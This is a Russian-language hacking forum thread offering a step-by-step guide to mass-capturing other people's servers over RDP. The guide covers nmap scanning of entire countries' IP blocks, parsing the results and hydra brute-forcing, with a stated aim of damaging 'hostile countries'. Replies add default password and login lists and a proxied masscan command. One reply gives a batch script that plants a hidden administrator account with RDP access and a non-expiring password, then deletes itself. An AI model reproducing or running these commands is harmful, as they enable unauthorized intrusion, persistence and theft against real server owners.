Статья В поисках лучшего алгоритма по захвату дедиков в 2К18

  • Автор темы Автор темы Cyber Satori
  • Дата начала Дата начала
  • Теги Теги
    дедики
CYBERSATORI EXPERIENCE 4 CAPTURE DEDICATED SERVERS ON LINUX SYSTEM // Мой опыт захвата дэдиксов с Лилы

CREATE NMAP SCRIPT FILE (Input All Major-IP Blocks of any Country here): // Оборачиваем следующие пару строк в скрипт, создаём пару txt-шек
http://www.ipdeny.com/ipblocks/ здесь можно посмотреть списки ипи-блоков по интересующей стране, но если воткнёте в подскан все разом, результаты придут к следующему году, так что не жадничаем и по-немножку сканим интересующую подсеть. Ведём журнал, записываем в блокнотик исследованые диапазоны.
Код:
c='Path/To/Your/Script/Here'
nmap -sS -p3389 -PS3389 -oG $c/scannedOnlineServers.txt -iL $c/hostsIPRange.txt -vv
CREATE PARSER FILE (to select only OK IP's list): // создаём сортировочную машинку которая извлечёт нам ипишки с открытым RDP портом.
Код:
p='/Path/To/Your/Script/Here'
grep -E '/open/' $p/scannedOnlineServers.txt | sed 's/Host: //' > $p/scanGhostFile.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -u > $p/openedServers.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -d » $p/openedServers.txt
rm $p/scanGhostFile.txt
PUT HYDRA COMAND (Best 4 Brute on Linux or use Metasploit experience): //ничего веселее гидры не нашлось, crowbar даёт ложные пробои и станится, поэтому загружаем пару топ-10 словарей (admin - password) и берём так сказать количеством, гидра хороша тем что не сильно нагружает процессор и в фоновом режиме может брутить сутки на пролёт не сильно задевая чувства верующих. В идеале думаю полезно разобраться и эксплойтить отсортированые ипишечки с Metasploit - но это уже тема для другой статьи, так как быстрых стандартных решений этого вопроса я пока не вижу.
Код:
hydra -L (loginTop10listHere) -P (passTop10listHere) -M (openedServersHere) -vV -o (SavedOKServers) rdp
TO CONTROL REMOTE DESKTOP : // входим в сбрученые оболочки и получаем профит
Код:
xfreerdp /u:LOGIN /p: PASSWORD /v:IP:3389
Так же предлагаю обсудить моё творчество, может у кого есть мысли на более рациональные варианты, пролистав весь рунет путнего по сабжу ничего не нашёл, решил выступить на данной конференции со своим мини-докладом. Всем спасибо за потраченое на мою статью время. Любая ваша критика, любые доводы уместны, но не обязательно будут приняты к рассмотрению. Удачных пробоев товарищи хэккерсы. Похороним экономику враждебно настроеных стран. Мы Анонисты - мы Легион! Так же отвечу на любые ньюби вопросы, если кто запутался в моей партянке.

6a472f3a81494f6d8a7a384181e85229.png
 
Последнее редактирование модератором:
Привет, всё очень симпатично, пока ещё есть время на редактирование статьи помести весь код в code теги
Код:
 CODE HERE
необходимую инфу найдёшь тут Правила оформления статей если чтото будет не понятно то пиши помогу разобраться

пс: арт прикольный есть ещё ?
 
Код:
первый блин комом увы, но я тебя запомнил) если критично, можете удалить статью - выкачу ремейк
 
Последнее редактирование модератором:
Код:
первый блин комом увы, но я тебя запомнил) если критично, можете удалить статью - выкачу ремейк
Зачем же удалять ))) я просто поправил оформление.
Жду новых статей. только не переводов а своих :)
 
инглиш тоже мой старичок, прививаю пипулсам вкус - зря ты так))) а текст фиолетовый ты один походу прочесть можешь, мне глаза разъело))) хоть я и величайший фэн кислотных трипсов
 
  • Нравится
Реакции: MLNK
инглиш тоже мой старичок, прививаю пипулсам вкус - зря ты так))) а текст фиолетовый ты один походу прочесть можешь, мне глаза разъело))) хоть я и величайший фэн кислотных трипсов
ЕСЛИ так то сорян тогда вообще отлично. про цвет да если тема тёмная то ппц )))
 
Как раз, первое чем решил заняться это брут RDP.
Отпишу что получится у человека без знаний и опыта, по твоему гайду.
Пока вопрос только где посмотреть топ login/pass list.
 
Последнее редактирование модератором:
  • Нравится
Реакции: RandellFox
да сам набросай что-нибудь вот мой пасс:
admin
123123123
123123
123
qwerty
password
pwd
administrator
12345
123456
12345678
123456789
letmein
abc123
passw0rd
pa$$w0rd

и логин листы:

administrator
admin
root
support
user
guest
server
adm1n
admin
User1
login
work

убери или добавь по желанию
 
На форуме уже есть темы с тем как сканить большие диапазоны. Если это делать конкретно с Nmap (а не с masscan) то нужно выставить блоки адресов, а то сканирование будет длится вечность. + понизить кол-во. запросов по ретесту.
кстати ещё есть спарта которая должна смотеть сохраненные в rdp логины, но это я где то прочитал, сам ей не пользовался никогда, может стоит попробовать.
хз может самому попробовать такой сценарий написать, хотя никогда темой RDP особо не интересовался.
 
  • Нравится
Реакции: Tihon49
На форуме уже есть темы с тем как сканить большие диапазоны. Если это делать конкретно с Nmap (а не с masscan) то нужно выставить блоки адресов, а то сканирование будет длится вечность. + понизить кол-во. запросов по ретесту.
кстати ещё есть спарта которая должна смотеть сохраненные в rdp логины, но это я где то прочитал, сам ей не пользовался никогда, может стоит попробовать.
хз может самому попробовать такой сценарий написать, хотя никогда темой RDP особо не интересовался.
Как я понимаю софт о котором ты пишешь узнает логин RDP?В таком случае кол-во сбрученных дедиков на выходе должно быть в несколько раз больше, чем с листом логинов.
 
Как я понимаю софт о котором ты пишешь узнает логин RDP?В таком случае кол-во сбрученных дедиков на выходе должно быть в несколько раз больше, чем с листом логинов.
Да, но это наверное руками придется делать, что вообще не комильфо. Короче посмотри спарту, может туда можно скрипты вписывать.
 
Да, но это наверное руками придется делать, что вообще не комильфо. Короче посмотри спарту, может туда можно скрипты вписывать.
нет не руками, для линукс есть такие скрипты которые умеют дергать логины с rdp и подставлять пару лог пас login:login login:login123 и т.д
на гите видел несколько скриптов, название не запомнил, для шиндовcа на память - NLB, ForcerX, Z669.
 

Функции спарта:
Повторное использование найденного пароля в тестируемой инфраструктуре. Если в были найдены имена пользователей/пароли, то они сохраняются во внутренних списках слов, которые затем будут использованы на целях в той же сети (срочные новости: сисадмины используют одни и те же пароли).

Я так понимаю это то что нужно, но какими командами это используется, я про линукс только вчера узнал.И как связать одно с другим чтобы работал понятия не имею, есть какие либо примеры?
 
  • Нравится
Реакции: Sunnych и moon13
CREATE PARSER FILE (to select only OK IP's list): // создаём сортировочную машинку которая извлечёт нам ипишки с открытым RDP портом.
Открытые порты можно собирать с помощью "Masscan" по моему он очень быстрей, можно ставить хоть 10000 потоков и информацию выдаёт доставерную. Пример работы "Masscan":

proxychains4 masscan -iL <файл с адресами, которые надо просканировать на открытые порты> -p3389 --rate=1000 |awk '{print $6}' > <файл куда буду сохраняться адреса с открытими портами>

"proxychains4" - работа через прокси (предварительно надо установить и настроить proxychains4)
"--rate=1000" - количество потоков
 
  • Нравится
Реакции: DefWolf
Интересно. Надо попробовать. Обычно это делал по старинке: под Виндой запускал masscan, затем NlBrute. Профит есть, но мало.
 
Статья хорошая, для сканирования и брута лучше использовать вычислительную мощность сервера, а не своего компьютера.
 
может у кого есть мысли на более рациональные варианты
И кстате, тут на форуме есть одна статья, у которой как мне показалось большой потенциал Взлом RDP windows 2017 . В данный период пытаюсь оседлать этот способ, но пока не совсем получается, а почему не получается, можно прочитать в самом конце этой темы (я там написал суть проблемы)
 
Порт 3389 уже до дыр заезжен школьниками, которые ставять локеры <тут должен был быть жесткий мат, но я сдержался> используйте не стандартные порты, например:
3390-3410, 13389, 23389, 33389, 43389, 53389, 63389, 73389, 83389, 93389

И так же думаю пригодится батник, который на всех языках создаёт вашу учётку:
Только замените ВАШЛОГИН и ВАШПАРОЛЬ, пароль должен быть сложным, иначе не на всех серверах получится создать учетку
Код:
Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user ВАШЛОГИН ВАШПАРОЛЬ /add
net localgroup %AdmGroup% ВАШЛОГИН /add
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" ВАШЛОГИН /add
net accounts /maxpwage:unlimited
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ВАШЛОГИН /t REG_DWORD /d 0 /f
attrib +H  C:\Users\ВАШЛОГИН /S /D
del %0
 
Порт 3389 уже до дыр заезжен школьниками, которые ставять локеры <тут должен был быть жесткий мат, но я сдержался> используйте не стандартные порты, например:
3390-3410, 13389, 23389, 33389, 43389, 53389, 63389, 73389, 83389, 93389
Судя по всему ты тоже ищешь RDP с помощью брута, какой программой пользуешься?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!